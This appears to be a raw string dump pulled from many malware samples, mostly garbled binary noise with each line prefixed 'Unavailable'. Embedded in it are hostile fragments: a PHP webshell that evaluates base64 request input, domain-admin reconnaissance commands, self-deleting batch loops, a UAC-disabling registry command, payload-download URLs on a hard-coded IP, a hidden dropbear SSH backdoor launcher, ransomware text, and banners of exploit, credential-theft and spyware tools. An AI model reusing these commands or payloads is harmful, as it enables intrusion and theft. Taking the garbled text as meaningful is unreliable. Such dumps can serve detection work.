Unavailable user-agent: %shost: %s:%dcache-control: no-cachecontent-type: application/x-octet-streampragma: no-cache3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff19490631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd:*:::d:\\:c:~:spmuvrcopy /y \"%s\" \"%s\" del /f \"%s\" del /f /ah \"%s\" if exist \"%s\" goto rept \\*.*.lnkdropped$innn[i$[i$^i[e[mdi[m$jf1wehn[^whl[^iin_hf$11mahzijnjbi[^[w[f1n$dej$[hn]1[w1ni1l[ic1j[mzjchl$$^he[[j[a[1_iwc[e[h$ywdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1w1[1cjm1[$[k1zw_$$ncn[[inbnnc[i9enanid[fzcx0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz!@#$%^&()`~-_=+[{]{;',.e_$0[bw\\rzy\\jb\\zy[nimirc[jrz]f_ridj0w9rfb[$fbc9[k_?wnhwi[$lz![nj_[[lk[8ihlo8ziil[[[$ynk[f_8[88wwwjw[ywnl$$z[ilf!$iz$!w>wl![w!k!$l!wow8$nj8![8n_i^$[>_n[zy[[xhn_c!nnfk[!z[i_^])[$n!]wj^,h[,!wzmk^o$dz[h[e!&w!l[$nd[d&)^z\\^[[iwh][[[jpyo[g$$e&n\\,wfg$[<g$[[ninn:j!!)wk[nj[[o!!ys
Unavailable fhhec
Unavailable =wsfp3
Unavailable vrmi
Unavailable xye@
Unavailable !qgn!
Unavailable %~gn
Unavailable hwtdd
Unavailable t00ls
Unavailable exitprocess3
Unavailable mok~ac
Unavailable yec#
Unavailable i3zt
Unavailable t&h+
Unavailable r&ec
Unavailable 2y8i
Unavailable {#x7
Unavailable psqrvwu
Unavailable !?j"
Unavailable dzhxh
Unavailable |$ e3
Unavailable /es/
Unavailable sssx-,
Unavailable ?+av]`
Unavailable googlecrashreport.dllcrasherrorscrashsendcrashadddatacrashcleanupcrashinit='base'.(str_replace(\"\\n\", ''.substr(md5(strrev(_cookieisset<?php $@assert(base64_decode($_request[(str_replace(\"\\n\", '', '(strrev($de'.'code';(str_replace(\"\\n\",'',;if(php_version<'5'){=substr_replace(
Unavailable hht\c
Unavailable popr
Unavailable [ fv
Unavailable rsfvxd.dattsb386.datfrmmlg.datsmdhost.dllk
Unavailable xp5sw
Unavailable q8wu
Unavailable `vector copy constructor iterator'
Unavailable )>'.1
Unavailable ^|z{
Unavailable q^`i-
Unavailable dlzu
Unavailable {wpce
Unavailable @l01wb
Unavailable =hu(0
Unavailable h9l$ht?h
Unavailable @[spec]
Unavailable guntbypass
Unavailable ;f4r
Unavailable zv6e
Unavailable p5k}%
Unavailable w"^8f
Unavailable o9yp
Unavailable cwkqmzlavvvvvvvvvvvvvcwsdcjkz85m7jvm7jfxkzmzmrdczxasmzmzzbj1ys/o
Unavailable zhya
Unavailable nray
Unavailable \e0w3
Unavailable ?u)#
Unavailable pttoy
Unavailable 3k0g
Unavailable init1\
Unavailable hxmv
Unavailable 45bw=
Unavailable 79cp
Unavailable #okc
Unavailable strf(
Unavailable readdir648
Unavailable wvpqr
Unavailable >0x;6
Unavailable e;m6
Unavailable volrec.pdbv
Unavailable y?zz
Unavailable <_wes
Unavailable acrotray.exec
Unavailable p408
Unavailable drw9}#
Unavailable 2`6+k
Unavailable (k1b;
Unavailable 6#phy
Unavailable vuuu
Unavailable enc.com.b&f=
Unavailable modstartmodstoptoo long data for this type of transportnot enough server resources to complete operationtask not execute. arg file failed.global\\msctf.shared.mutex.zrxpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
Unavailable @uy
Unavailable x=lh)
Unavailable +skv
Unavailable nwvs
Unavailable x9-v5['
Unavailable d8t$ht
Unavailable r9?}3
Unavailable loadli
Unavailable ?qbj
Unavailable >2pml$
Unavailable whoami & hostname & ipconfig /allnet user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (get-content $env:public\\libraries\\dns.ps1) -replace ('#'+'##'),$botid | set-content $env:public\\libraries\\dns.ps1invoke-expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertto-base36(get-random -maximum 46655)))flash.media.sound()call kernel32!virtualalloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4d36e972-e325-11ce-bfc1-08002be10318}netstreamzhoupin exploit crewzhopin exploit crewbackdoorloggerzhuaddresspcap_dump_openresolving ips to poison...warnning: gateway ip can not be found%s-%02d%02d%02d%02d%02d.rc:\\users\\%s\\appdata\\cookies\\n
Unavailable 0(24,
Unavailable #kio
Unavailable xi;=
Unavailable ]_^[
Unavailable dgqv
Unavailable [e7]p>u
Unavailable <font size=4 color=red>com 6 is success</font><font size=4 color=red>com 7 is success</font><font size=4 color=red>com isn't success</font><font size=4 color=red>process is exist</font><
Unavailable jpeg
Unavailable txrt
Unavailable cvrit000.bat[
Unavailable upx-shit v0.1 - www.blacklogic.net - code by
Unavailable comparestringw
Unavailable ip2{
Unavailable v&f?
Unavailable fg9$ou
Unavailable d$`h;
Unavailable x3\]7
Unavailable d,3'
Unavailable `l3fm
Unavailable kt\00dc
Unavailable m`x\
Unavailable t$(3
Unavailable a00dcm
Unavailable t+vw
Unavailable microsoft.visualbasic.applicationserviceswloaderwloader.g.resourcesexecuteassemblybynamegettypefromhandlegetmanifestresourcenamesinitializearraygetmanifestresourcestreamadwind.classextra/constantes.classdesinstalador/made.adwind%s%dpara1=%dpara2=%dpara3=%dccommandattribeccommandcdccommandcmdccommandnopc
Unavailable a_a^_^]
Unavailable a>pp&
Unavailable :"gq
Unavailable n\da
Unavailable \>z!
Unavailable sysfreestring
Unavailable oheg
Unavailable p016
Unavailable h1`u
Unavailable <rda
Unavailable xbo'
Unavailable zty1l
Unavailable 3uby`m
Unavailable w6sv
Unavailable z=lri|
Unavailable l$83
Unavailable e0auif
Unavailable _hypot
Unavailable dmcs
Unavailable *mo+g
Unavailable zf215
Unavailable eg00dc%
Unavailable h!au
Unavailable hnh(
Unavailable (r-cs
Unavailable +qdf`
Unavailable qzky
Unavailable zf2g
Unavailable @"*?p
Unavailable g-am
Unavailable .rlp
Unavailable {kmiop
Unavailable @8it
Unavailable awl\:6}]27}w
Unavailable {xfh3
Unavailable t$tf;
Unavailable /ugs
Unavailable ewth9
Unavailable ^]yqyf
Unavailable ca<nrw
Unavailable ' was corrupted.
Unavailable uo8a
Unavailable @x}a
Unavailable (d$0f
Unavailable i4an
Unavailable ;q-&
Unavailable unhandledexceptionfilter
Unavailable ,%n0
Unavailable restrict(
Unavailable hxxxx
Unavailable hh-@
Unavailable ^pa,5y
Unavailable tjd+
Unavailable u3hch<h
Unavailable wy&`
Unavailable hl[c
Unavailable 8@nu
Unavailable fkqqa{
Unavailable 5h1@
Unavailable d$pp
Unavailable 6#6r
Unavailable m?vs
Unavailable d$,d
Unavailable t$ha
Unavailable hxyc
Unavailable *lbd
Unavailable ke6lnh
Unavailable ^1z2
Unavailable u m3
Unavailable _y/5,
Unavailable x^77v
Unavailable ) gj
Unavailable pqrs
Unavailable 001wb
Unavailable 8@tjh
Unavailable >_is
Unavailable expr-v.1.5.
Unavailable @u(p
Unavailable '0yh
Unavailable ki*d
Unavailable `pack$@
Unavailable >2h1
Unavailable /g3b00dc^
Unavailable ac:\\users\\cool\\documents\\visual studio 2010\\projects\\dlltest\\release\\dlltest.pdb\x00up file error\x0d\x0aup file ok\x0d\x0aaallaamoot
Unavailable 23,<
Unavailable civ3[
Unavailable jcn+j
Unavailable 3l9\
Unavailable er-m5
Unavailable iss*
Unavailable |$0s-
Unavailable d$(m
Unavailable a@fd
Unavailable fl;%(
Unavailable #{@wvpf
Unavailable dkik
Unavailable .x>fa
Unavailable ]vz""
Unavailable m}ct
Unavailable f?!2b
Unavailable w-z\
Unavailable d8(t[h
Unavailable ?ev}0
Unavailable gx*}=,
Unavailable bdz#r
Unavailable bwhs
Unavailable "ih:,
Unavailable c03:
Unavailable code-lock.ocx
Unavailable ns-x
Unavailable {n:>
Unavailable lj[;>
Unavailable l=,:+
Unavailable `string'
Unavailable 5^9r
Unavailable exestealth v2 shareware f
Unavailable a9uy7
Unavailable ?/a5z
Unavailable k`h;
Unavailable hcb~
Unavailable d{f7
Unavailable a_a^_
Unavailable 8$uu
Unavailable h!i<`
Unavailable namz+y
Unavailable @jd:x
Unavailable qrrprr
Unavailable vjj.
Unavailable /selfservice/microsites/search.php?%016i64d/solutions/company-size/smb/index.htm?%016i64dm
Unavailable "a0icz
Unavailable upx-shit v0.1 - www.blacklogic.net - code by [500mhz]
Unavailable s4lc?
Unavailable a-vx
Unavailable 0iea
Unavailable x awh
Unavailable 3<w\n
Unavailable exitprocess]
Unavailable ntmcn7$
Unavailable getsystemtimeasfiletime
Unavailable s cxmdg
Unavailable t$lrpv
Unavailable 0`s0o~
Unavailable ":3piqm
Unavailable 5e v
Unavailable d$$h6q
Unavailable fd9|t@
Unavailable 8^z]
Unavailable _u&x
Unavailable k00dc
Unavailable 2tpp
Unavailable d7x5
Unavailable jm?k
Unavailable fb9<hu
Unavailable @kernel32.dll
Unavailable ~g/>~
Unavailable hast
Unavailable regged to gold sample
Unavailable 3)sqy
Unavailable @.gfids
Unavailable c:\\projects\\greaterdoctor\\trunk\\greaterdoctorsrc\\build\\release\\dllconfig\\dllconfig.pdbgreaterdoctor [ commandline args configuration ]-useage: <scanner> \"<cmdline args>\"+daemon_version,system,processor,refid,clockusage: %s typeofscan ip_address# scanning ip %d.%d.%d.%d***** %s ***** (length %d)d$7p
Unavailable w)si
Unavailable gsyw
Unavailable %g0/
Unavailable enablelua /t reg_dword /d 0 /f*a01**a02**a03**a04**a05**a06*hostsettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dlldefpathhknamehportipathpanelpathrooturlvirusscanpronoipstreamwebcamdomain_passwordstub.form1.resourcesf
Unavailable hjve]
Unavailable verr
Unavailable [pcj
Unavailable d$vid$\l
Unavailable modf
Unavailable shregsetusvalueww
Unavailable 1@e~ry
Unavailable <snw
Unavailable kph;
Unavailable stack area around _alloca memory reserved by this function is corrupted
Unavailable ]aki
Unavailable ssfkhttp://xa.xingcloud.com/v4/sof-everything/http://www.mysearch123.com21e223b3f0c97db3c281da1g7zccaefozzjcktmlmay
Unavailable e8a_a^a]a\_^[]
Unavailable h[:b
Unavailable writedroofiledroocmddroohideupdatepzfilehidesysupfilehidesyscmddesnation %s is small than finished!
Unavailable dxy5g
Unavailable a^_^
Unavailable d$49c
Unavailable ,gxl
Unavailable .ylf
Unavailable gl\c^l
Unavailable frfzfpfx
Unavailable 5d]}
Unavailable clg)l=
Unavailable dx&[==#l
Unavailable sm873
Unavailable get domain:%s ip failed.connect to server failed.kernel32.dll^g\\.sus\"bu56load3o mytmp(im) values (marathontool/blind sql injection tool based in heavy queriess
Unavailable <vgl
Unavailable ..h]
Unavailable w (h=
Unavailable pyv-|
Unavailable qj(tr
Unavailable rs#|g
Unavailable btza^
Unavailable )ba=
Unavailable "o\a
Unavailable !9>33
Unavailable recoder : houdini (c) skype : houdini-fx'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=response = post (\"is-ready\",\"\")execute failed!execute success!execute success]sres=%ssmac=x-down(x-downonly(x-exec(x-delay(d:\\p\\win\\release\\win.pdbd:\\p\\win\\release\\s4.pdbcmdshell.secloginedquerytimeripaddress=%d.%d.%d.%d%s%s%02x-%02x-%02x-%02x-%02x-%02xcommand.comosversion=%slogined=%cmainfilename=%s
Unavailable |[qh
Unavailable svw3
Unavailable w9?b
Unavailable t`a+
Unavailable /-gc1
Unavailable debugger or tool for monitoring detected!!!
Unavailable |$(a^
Unavailable d$=s
Unavailable ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
Unavailable dvhd
Unavailable http://%s/%s%u processor:memory (free/total): %d(mb)/ %d(mb) (use %d:\\buildsource\\9\\windowsclient\\windowsclient.client.rc\\binaries\\win32\\release dlphook\\*
Unavailable c01e
Unavailable hq|}
Unavailable 1kkz
Unavailable kuz{
Unavailable zhlookup.propertiesmimikatzrunnerzhmimikatzzh0ush311your target
Unavailable 6n;x
Unavailable gh0st updatesandbox_avg10_vc9_sp1_2011gholeerichha
Unavailable a`th
Unavailable a_a^a\_^][
Unavailable sssx-2
Unavailable ;2ds#i
Unavailable @a_@
Unavailable (p[f
Unavailable |xxip
Unavailable :ftg-
Unavailable d$`u
Unavailable ]%azc
Unavailable 5^kb
Unavailable 9a88
Unavailable psddv
Unavailable <u]k%o
Unavailable flsgetvalue
Unavailable iut8
Unavailable safearrayptrofindex
Unavailable n]>c\o@
Unavailable getlocaleinfoex
Unavailable dllh
Unavailable h7q8
Unavailable o=(*
Unavailable h`#@
Unavailable >mz8
Unavailable d$4wh@gd
Unavailable d$@h
Unavailable ynz8
Unavailable 7du^
Unavailable ;bko<
Unavailable rz5k
Unavailable msdnet32.dll_ntdsllrc@4_ntdsllrv@8_ntdsllspcty@12_xdslconnect@8_ntdsllspc@8_ntdsllsp@20_safemodent@12_ntdr@0crf32lib.dllcrflib.dllclsids2/creationdate (d:20111114160831)shellsrv32.dllmsdnet.dllshellsrv.dllaltsrv.exealtnet.exealtnet32.exeheg235_add.php{118-32-foobox-15}{118-32-fooboll-15}{132-79-footboll-18}{119-36-footboll-92}_pauseprintspool%error set lint into file failed. %dnadzorlog.txt_secondprintspool
Unavailable expr-v.1.4.
Unavailable n7od
Unavailable i!3,
Unavailable infoharvestercmd.dllhavex1312312f
Unavailable ;b?[
Unavailable ^q]px@,$3e
Unavailable td-y
Unavailable &szu4
Unavailable )!nb
Unavailable [rf!
Unavailable u"hcmhh
Unavailable x,ih
Unavailable el=h-
Unavailable hk@]1
Unavailable tge3
Unavailable n;1y
Unavailable v:])
Unavailable ;i|+`
Unavailable "sj/
Unavailable 'r$z_
Unavailable |$(l
Unavailable aazl
Unavailable v#su
Unavailable &0z}
Unavailable tsf91tnh
Unavailable qbcm
Unavailable raiseexception
Unavailable x~h9
Unavailable ^qyp
Unavailable \.qr
Unavailable l$dh
Unavailable 2~3tm;
Unavailable abcdefghijklmnopqrstuvwxyz
Unavailable sefsrfdbukvcrevtq1jjufrjt05cu3lzdgvtxenlbnryywxqcm9jzxnzb3jcma==gqrgfrpva
Unavailable t_quit_got_dir
Unavailable \8_e
Unavailable wavawh
Unavailable wj4 4g
Unavailable $+cj
Unavailable 3>n;ku
Unavailable halpp
Unavailable j97b
Unavailable tqh9
Unavailable l8x,z,
Unavailable sys\\tdip.dbgdip.systdip.pdbm
Unavailable x av3
Unavailable v#sf
Unavailable 0ep\
Unavailable \$ h;
Unavailable 5^f%
Unavailable $tmes
Unavailable 6b}z
Unavailable {i"b
Unavailable fke,dfd
Unavailable fd$wo
Unavailable {:p^
Unavailable i,fx
Unavailable mcf892108549c:\\temp\\ljjjklllllllllllllllllll324234444444444444444444444444fwedssssssslllllllllllljiooooooooooooooooooooooooooooohjknnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn78ghuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuijjjjx.pdb<description>d3scription</description><strong>this page is big find</strong>onthread_pipeserver6b4e2f40b138c4921f1584ca0efc19ea6b4e2f6b4e2f40%
Unavailable kf%q5
Unavailable microsoft enhanced cryptographic provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exec:\\intel\\logs\\file.pdbc:\\users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
Unavailable p44p
Unavailable cm[+] backdoor shellcode written[*] attempting exploit method %derror: could not calloc() for shellcode buffershellcodesize: 0x%04x + 0x%04x + 0x%04x = 0x%04xgenerating shellcode([0-9a-za-z]+) ok logout completederror: domino is not the expected version. (%s, %s)[-] error: exploit choice not supported for target os!!error: target machine out of npp memory (very bad!!) - backdoor removed[-] error: backdoor not present on target*********** target architecture is x64 ************[+] \"targetport\" %hu---<<< complete >>>---[+] \"networktimeout\" %huf
Unavailable yyn]z
Unavailable 6}mzm<_
Unavailable \;n_"
Unavailable t$4f;
Unavailable k(.q
Unavailable \\*\\3vpnu
Unavailable zxnw
Unavailable roinitialize
Unavailable yr}
Unavailable 9)gv
Unavailable rle9
Unavailable %q*0
Unavailable 1;@h
Unavailable 00dcn
Unavailable ~sm;b
Unavailable e#q"1fq'
Unavailable ydj/
Unavailable 0hxj
Unavailable wnij
Unavailable d0ooa
Unavailable @zxw
Unavailable zi]x
Unavailable t$hh
Unavailable >ncruc2
Unavailable ,sv3
Unavailable /z?&q
Unavailable .fz_@
Unavailable |[4je*
Unavailable \4^w
Unavailable getprocaddressya
Unavailable mapviewoffile
Unavailable r7;f
Unavailable qf.r
Unavailable {|4$
Unavailable usvqrw
Unavailable $et+
Unavailable l9l$p
Unavailable ex'16
Unavailable mb*4
Unavailable vlkws
Unavailable b c0
Unavailable hhb@@"
Unavailable vids
Unavailable pejk
Unavailable wuwvrqs
Unavailable _,c>x
Unavailable upi91tk
Unavailable won't be able to recover your files anymore.</p>j
Unavailable i)vj
Unavailable "b-)
Unavailable
Unavailable {b7
Unavailable ?defo?d
Unavailable %ny<
Unavailable 7]+[
Unavailable .pdata
Unavailable y411
Unavailable {kwq
Unavailable 2rr#6v
Unavailable wqw+xh
Unavailable r^\ai\op=r
Unavailable _fvv
Unavailable t;q[.9?x
Unavailable myu=
Unavailable $>)+m
Unavailable f;\$ts
Unavailable d8l$ht
Unavailable =/,<
Unavailable })&(
Unavailable cli::array<
Unavailable nspack$@
Unavailable @ch;
Unavailable silent team app protector
Unavailable kex?
Unavailable v8xy
Unavailable kvinterlockedcompareexchange
Unavailable pla<
Unavailable heaprealloc
Unavailable f,hz
Unavailable d$0p
Unavailable i96t:h
Unavailable 5r3e
Unavailable kernel32.dll
Unavailable . 8h'
Unavailable &=q~_
Unavailable w!n7
Unavailable 6-s<
Unavailable d$no
Unavailable session folder with name '%s' already exists.show unconnected endpoints (ctrl+u)c
Unavailable [wxp[
Unavailable crc3`
Unavailable c:\\program files\\devstudio\\vb\\vb5.olbm
Unavailable @uhw
Unavailable !d$h
Unavailable /tmp/tmpaddressbook.vcf
Unavailable psqr
Unavailable debug: cannot allocate memory for ptrfilearray!%
Unavailable )t$@e
Unavailable qrs3
Unavailable fc94wu
Unavailable v10:
Unavailable ]nu1
Unavailable ppycu 2f
Unavailable 13&y
Unavailable loadlibraryaexpr-v.1.3.u
Unavailable 1cb+%
Unavailable a[wz
Unavailable @z0oz_
Unavailable rxt;
Unavailable ;p>a
Unavailable (f<a
Unavailable 5m!_:sq
Unavailable cpla
Unavailable `default constructor closure'
Unavailable #wzx
Unavailable p)s%
Unavailable uf!t$(h!t$
Unavailable \\ws2check.exe\\trojans.lst1
Unavailable mwwd
Unavailable ]u-w]
Unavailable p01wb
Unavailable pek{
Unavailable 089paradoxratstartrmcamfloodersslowlarisshitemidset_remote_chatm
Unavailable d$8h
Unavailable *3se
Unavailable zhhr
Unavailable software\\kasperskylab\\protected\\avp12\\environmentsoftware\\kasperskylab\\protected\\avp9\\settings%systemroot%\\system32\\winlogon.execom.apple.pubsabagent/tmp/screen.jpeg
Unavailable 2pst
Unavailable ep|&.
Unavailable nqw.
Unavailable wbruteerror.txtgood.txtsource.txtbad.txtgenerator ip@login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
Unavailable d|0i
Unavailable qy'r
Unavailable outputdebugstringw
Unavailable ss"e
Unavailable m=%h
Unavailable c|w{
Unavailable rnd!
Unavailable getcurrentthread
Unavailable m&(j
Unavailable d$ i
Unavailable xk#d
Unavailable [=1"\
Unavailable $#ftk
Unavailable @8l$ht
Unavailable c:\\users\\cmd\\desktop\\msacm32\\release\\msacm32.pdbp
Unavailable ^ku7fs
Unavailable mec&
Unavailable 4#.#n
Unavailable 'tczc]
Unavailable ~%m*kf
Unavailable tda+
Unavailable 6bu!
Unavailable z3;,
Unavailable `rtti
Unavailable jn*x
Unavailable lg8q
Unavailable )ka
Unavailable # cq
Unavailable :j|up/
Unavailable "c\
Unavailable #$+3
Unavailable @sm00dc
Unavailable d$tj
Unavailable 6p}<dk
Unavailable "}40
Unavailable +,+d
Unavailable ?.ram
Unavailable 9%c@d
Unavailable }t8y
Unavailable eyau
Unavailable 6v@d
Unavailable 79kdj
Unavailable sqh$
Unavailable (=*>
Unavailable ?lsd
Unavailable yhee
Unavailable ---hidehide---port = %dimagename found at:%sj
Unavailable m0(00dc
Unavailable o1iz)
Unavailable j<ck
Unavailable zd0]
Unavailable m?vf
Unavailable lppe == nullrunexecmd.dllm
Unavailable pass->logon successful250 requested file action okay, completed.m
Unavailable :<=wv
Unavailable .3ds
Unavailable }yc/g4
Unavailable n&5iwm)
Unavailable ------- www: http://zalexf.narod.ru/ -------
Unavailable l01wb
Unavailable +o=m.
Unavailable q].qa)bs
Unavailable uge}
Unavailable jw5&
Unavailable ggy*
Unavailable d$ut
Unavailable _^[]
Unavailable w\wt
Unavailable p)!p
Unavailable vh-r
Unavailable failed crc check
Unavailable http://hkmujj.co.cc--------
Unavailable _^zy[]
Unavailable l4'q
Unavailable ?m+0
Unavailable d$@+
Unavailable `d0qc
Unavailable =a]fql,u
Unavailable temeg
Unavailable 0ht4
Unavailable 8w;9
Unavailable s30al
Unavailable )bh#i
Unavailable gsd1
Unavailable @<a;
Unavailable z`$jf
Unavailable connect_back_tcp_channel#do_connect:: error resolving connect back hostnamekernel32.dll getprocaddressloadlibraryaws2_32.dllc
Unavailable pew6a
Unavailable (]ddedata initialized (ansi), app strings are '%s' and '%s'
Unavailable 1.23
Unavailable h\w}!
Unavailable _l0k
Unavailable lj@?om'
Unavailable l$hh
Unavailable >sp=
Unavailable owm&
Unavailable q<v+`
Unavailable nbzv
Unavailable d$(a
Unavailable =c;~<
Unavailable f{hu
Unavailable i<^v
Unavailable jh01wb
Unavailable winhelpwreadprocessmemorywshshell.run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falsewshshell.currentdirectory = \"c:\\windows\\temp\\dropbear\\\"set wshshell = createobject(\"wscript.shell\")dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly formatted command= authorized_keys optionthis dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassds5bu9te7s
Unavailable 8$us
Unavailable yli0
Unavailable 2-ipi
Unavailable -8s
Unavailable r}wf
Unavailable g}im+%
Unavailable cryptunprotectdatac
Unavailable 0v;yq
Unavailable t$`d
Unavailable dd.$
Unavailable h`sc
Unavailable _x7=
Unavailable t$(a
Unavailable cfffrx,`,`2$f=hx
Unavailable n)tm
Unavailable 8?f!i'b
Unavailable kx+g
Unavailable ki#v
Unavailable friday
Unavailable getenabledxstatefeatures
Unavailable }=->2
Unavailable cv:
Unavailable )>6{1n
Unavailable d$@a
Unavailable ^o_k
Unavailable h&f;
Unavailable 8mz-
Unavailable vwwh
Unavailable k9d9n
Unavailable |seex
Unavailable |1b;nh%g
Unavailable %s-sn%d-%s%
Unavailable +-rni
Unavailable server.dllc
Unavailable &`0%'
Unavailable $qe}
Unavailable pe1wxcfvybho5c
Unavailable 'eec
Unavailable a}xzv&3
Unavailable usqwvr
Unavailable 1by>
Unavailable c:\0000001.dat
Unavailable esikv
Unavailable zw[~
Unavailable unl+
Unavailable f~+e
Unavailable hvf;
Unavailable hxf}"
Unavailable y`)[
Unavailable bu9q
Unavailable sit!
Unavailable |$@l
Unavailable !not enough memory$
Unavailable c#ns
Unavailable enterprise mailing serviceblacklisted by rule: %s:%s/successmails?campaignnum=%ld/timedoutmails?campaignnum=%ld/invalidmails?campaignnum=%ldfailed to download maillist, retryingno maillist loadedsuccessfully sent using smtp account %s (%d of %ld messages to %s)successfully sent %d of %ld messages to %ssending to %s in the same connectionnew connection required, will send to %smail transaction for %s is over.domain %s is bad (found in cache)domain %s found in cachedomain %s isn't found in cache, resolving itall tries to resolve %s failed.failed to receive response for %s from dns servergot dns server response: domain %s is badgot error %d in response for %s from dns servermx's ip for domain %s found in cache:timeout waiting for domain %s to be resolvedno valid mxes for domain %s. marking it as badresolving mx %s using existing connection to dns serverall tries to resolve mx for %s are failedresolving mx %s using dns serverfailed to receive response for mx %s from dns servert
Unavailable 5v4>
Unavailable ,d_z
Unavailable 50b@
Unavailable cookie: pgv_pvid=%016i64d{e190bc79-02dc-0166-4cf1-bd8f8cb2ff21}index.htm?%016i64dakasha_path: %scycle: %d, sleep time: %dinstalldriver: %d %s(%s)succeed to drop, please wait for the next payload being loaded.!module mimi!axel url path{
Unavailable efeb0a9c6aba4cf5958f41db6a31929776c643dedc65cc9b67ab8b0066ff2492\\device\\ndisraw_\
Unavailable tt(i
Unavailable .?avdnamestatusnode@@
Unavailable qx/=
Unavailable dm}2
Unavailable t$(e3
Unavailable m!ldt
Unavailable y:?d
Unavailable w;oz-+{
Unavailable <)fzh_^d
Unavailable )t$2
Unavailable mw|8
Unavailable rpx8
Unavailable ( \rdg
Unavailable q~cgl
Unavailable msd users versionj
Unavailable 8?u$h
Unavailable 8$u*e
Unavailable _a$,
Unavailable fd9<xu
Unavailable ~zk[r8
Unavailable svpd
Unavailable iqhl
Unavailable (jw^
Unavailable 6"m-h
Unavailable qv0[
Unavailable pfvr
Unavailable ingl
Unavailable rzkc^r
Unavailable 6+]{
Unavailable ,tdz{
Unavailable i7+,
Unavailable s",v_a
Unavailable ys@_o
Unavailable k%?=
Unavailable tlssetvalue
Unavailable xph;
Unavailable vx\s
Unavailable 00dc6
Unavailable |$(i
Unavailable `placement delete[] closure'
Unavailable 08{n
Unavailable %s\\%s%d.%sh
Unavailable zcg.test.aspxspypluginstestplugin{\rt01{\rtxa3john doeauthor stonecontent-disposition: form-data; name=\"m1.jpg\"c
Unavailable 7a88
Unavailable .jngibd%s\\sa\\saopts.datspyagent_hwnd32%s\\sacache\\nowin.logsoftware\\spytech\\spyagent prokeystrokes typed
Unavailable 8#f
Unavailable u'e3
Unavailable aecf]
Unavailable e9ve
Unavailable @@"8
Unavailable z_jd
Unavailable qoe`
Unavailable mkdir %s%s > nul 2>&1p[%s%s%d.%s
Unavailable /s5h
Unavailable y41p
Unavailable few#s
Unavailable pvw.
Unavailable $v[i
Unavailable l!hj
Unavailable gt)'
Unavailable 3+e1
Unavailable fd9+
Unavailable i96t4h
Unavailable rq@=
Unavailable /^rd7
Unavailable 8@ti
Unavailable wmiexec.vbswmiexec errorin shell mode, running command background and persistentconnectport transmitportusage of pskillwhat user are we bruteforcing[server]connection tousage of packet transmitsof\x00twar\x00e\\mi\x00cro\x00soft\\win\x00dows\\cur\x00rent\x00vers\x00un\x00version\\r\x00dows\\current\x00software\\micro\x00/%lu.asp/%lu.txt/index.html?id=%ld\\httpclient.txtabout hc1host_namehost_portmozilla/4.0 (compatible; msie 6.0; windows nt 5.1)msutemp.dbtemp.datfs.opentextfile(server.mappath(\"online.txt\"),8,true)<%if session(\"pig\") <> 1 then%>ed132e13d1332bf7e2612a0eb848b30a<title>cr by
Unavailable /u1]
Unavailable by|p
Unavailable <$_1
Unavailable norton speedmhwanh
Unavailable pqwv
Unavailable player.tmpp
Unavailable b:90
Unavailable l$`m
Unavailable pekwq^
Unavailable u-0] ctm
Unavailable 4kc7
Unavailable he58r>$9
Unavailable t _%u-%u%1cs
Unavailable \lo}
Unavailable d$yy
Unavailable ii+m="z
Unavailable rnf(t
Unavailable rhwp`p-v
Unavailable n[xt
Unavailable volatile
Unavailable d$8;
Unavailable px>eqh
Unavailable h_iy
Unavailable /[(!
Unavailable fs9m
Unavailable run-time check failure #%d - %s
Unavailable enum
Unavailable mfu`
Unavailable {zdn
Unavailable `*7yf
Unavailable +n@8z3
Unavailable @*i8*
Unavailable y[~{n
Unavailable mi#)
Unavailable pqrvv
Unavailable watcom c/c++32 run-time system. (c) copyright by watcom international corp.
Unavailable 2qeqy{
Unavailable hx"d
Unavailable >"wu
Unavailable fd9$hu
Unavailable e-."
Unavailable )01wb
